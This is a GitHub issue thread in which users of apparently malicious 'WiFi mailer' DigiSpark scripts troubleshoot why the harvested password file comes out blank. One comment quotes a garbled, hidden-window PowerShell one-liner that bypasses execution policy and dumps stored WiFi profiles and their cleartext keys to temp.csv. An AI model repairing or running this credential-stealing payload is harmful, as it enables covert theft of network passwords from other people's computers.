-
Notifications
You must be signed in to change notification settings - Fork 604
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Wifi Password file blank #60
Comments
Hi, glad you are interested in using one of the WiFi mailer scripts. Could you please provide some more relevant information like which script you are using, if the computer you are using the script on indeed has WiFi passwords stored on it, your Windows Build number etc.? |
hi, i have the exact same problem with this script: DigiKeyboard.print (F ("powershell -NoP -NonI -W Hidden -Exec Bypass " (netsh wlan show profiles) | Select-String '\: (. +) has an output which I believe is incorrect, I get: powershell -NoP -NonI -W Hidden -Exec Bypass \ (netsh wlan show profiles) | Select-String : (. +) $ | % {$ name = $ _. Matches.Groups [1] .Value.Trim (); $ _} | % {(netsh wlan show profile name = $ name key = clear)} | Select-String Key Content '' W + '': (. +) $ | % {$ pass = $ _. Matches.Groups [1] .Value.Trim (); $ _} | % {[PSCustomObject] @ {PROFILE_NAME = $ name; PASSWORD = $ pass}} | Export-Csv temp.csv thanks in advance for any help. |
Hellow @fiustif, i have the same problem, did you manage to solve it? if yes, please send me the solution :) |
Hello, the code works perfectly but the file temp.csv is always blank (0 bytes). Why?
The text was updated successfully, but these errors were encountered: